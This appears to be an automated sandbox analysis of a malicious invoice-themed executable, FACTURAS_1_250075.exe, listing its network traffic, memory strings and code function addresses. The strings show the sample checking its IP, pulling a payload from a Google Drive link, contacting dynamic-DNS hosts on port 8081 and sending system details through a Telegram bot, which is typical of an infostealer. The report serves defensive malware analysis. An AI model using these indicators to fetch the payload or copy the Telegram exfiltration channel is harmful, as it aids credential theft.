          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 26 Feb 2025 11:35:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
          Source: FACTURAS_1_250075.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: FACTURAS_1_250075.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003624E000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036197000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003623F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en(m
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003624E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/L
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526626759.0000000005B90000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5s&
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005C1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/)
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2526648319.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.2035517053.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.2006358715.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=downloadA
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360DC000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.00000000360DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036175000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036106000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003614B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.000000003732D000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.00000000370B1000.00000004.00000800.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000002.2545555902.0000000037311000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000003.1999721113.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, FACTURAS_1_250075.exe, 0000000C.00000003.1999585565.0000000005C25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.0000000036270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/(m
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
          Source: FACTURAS_1_250075.exe, 0000000C.00000002.2544138212.000000003627A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65194
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65195
          Source: unknown | Network traffic detected: HTTP traffic on port 65199 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65210 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65199
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65210
          Source: unknown | Network traffic detected: HTTP traffic on port 65195 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65197 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65197
          Source: unknown | Network traffic detected: HTTP traffic on port 65191 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65190
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65191
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65209
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65203
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65201
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65207
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 65205
          Source: unknown | Network traffic detected: HTTP traffic on port 65205 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65207 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65194 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65203 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65201 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65190 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 65209 -> 443
          Source: unknown | HTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.10:65190 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:65191 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:65210 version: TLS 1.2
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard | 0_2_00405050
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 12_2_004030D9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | File created: C:\Windows\resources\0809
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_00406344 | 0_2_00406344
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 0_2_0040488F | 0_2_0040488F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_00406344 | 12_2_00406344
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_0040488F | 12_2_0040488F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FC468 | 12_2_057FC468
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FC738 | 12_2_057FC738
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FC147 | 12_2_057FC147
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F7118 | 12_2_057F7118
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FA088 | 12_2_057FA088
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F5373 | 12_2_057F5373
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FD278 | 12_2_057FD278
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FCCD8 | 12_2_057FCCD8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FCFAC | 12_2_057FCFAC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F69A0 | 12_2_057F69A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FE988 | 12_2_057FE988
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FCA08 | 12_2_057FCA08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F3E09 | 12_2_057F3E09
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057FE97B | 12_2_057FE97B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F29EC | 12_2_057F29EC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F3B83 | 12_2_057F3B83
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_057F3AA1 | 12_2_057F3AA1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ED4D0 | 12_2_380ED4D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E00F8 | 12_2_380E00F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ECE30 | 12_2_380ECE30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EFB10 | 12_2_380EFB10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E8422 | 12_2_380E8422
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E443F | 12_2_380E443F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E6436 | 12_2_380E6436
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E8430 | 12_2_380E8430
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E244F | 12_2_380E244F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E6440 | 12_2_380E6440
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E4450 | 12_2_380E4450
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC06F | 12_2_380EC06F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EA868 | 12_2_380EA868
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E2460 | 12_2_380E2460
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EA878 | 12_2_380EA878
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ED476 | 12_2_380ED476
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC080 | 12_2_380EC080
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EECA7 | 12_2_380EECA7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EECB8 | 12_2_380EECB8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E88B0 | 12_2_380E88B0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E88C0 | 12_2_380E88C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E68C0 | 12_2_380E68C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E68D0 | 12_2_380E68D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E48D0 | 12_2_380E48D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E00E7 | 12_2_380E00E7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E48E0 | 12_2_380E48E0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E28E0 | 12_2_380E28E0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EACF7 | 12_2_380EACF7
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E28F0 | 12_2_380E28F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EAD08 | 12_2_380EAD08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E8D08 | 12_2_380E8D08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC502 | 12_2_380EC502
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E8D18 | 12_2_380E8D18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC510 | 12_2_380EC510
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E6D50 | 12_2_380E6D50
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E4D62 | 12_2_380E4D62
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E6D60 | 12_2_380E6D60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E2D72 | 12_2_380E2D72
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E4D70 | 12_2_380E4D70
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EF170 | 12_2_380EF170
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EB189 | 12_2_380EB189
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ED989 | 12_2_380ED989
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E2D80 | 12_2_380E2D80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EF180 | 12_2_380EF180
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EB198 | 12_2_380EB198
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ED998 | 12_2_380ED998
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9198 | 12_2_380E9198
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC991 | 12_2_380EC991
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E91A8 | 12_2_380E91A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EC9A0 | 12_2_380EC9A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E51EF | 12_2_380E51EF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E71E1 | 12_2_380E71E1
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E31FF | 12_2_380E31FF
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E71F0 | 12_2_380E71F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E5200 | 12_2_380E5200
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EB617 | 12_2_380EB617
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E3210 | 12_2_380E3210
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EB628 | 12_2_380EB628
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9629 | 12_2_380E9629
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380ECE20 | 12_2_380ECE20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E9638 | 12_2_380E9638
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EF638 | 12_2_380EF638
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EDE4F | 12_2_380EDE4F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EF648 | 12_2_380EF648
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E766F | 12_2_380E766F
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380EDE60 | 12_2_380EDE60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exe | Code function: 12_2_380E567F | 12_2_380E567F
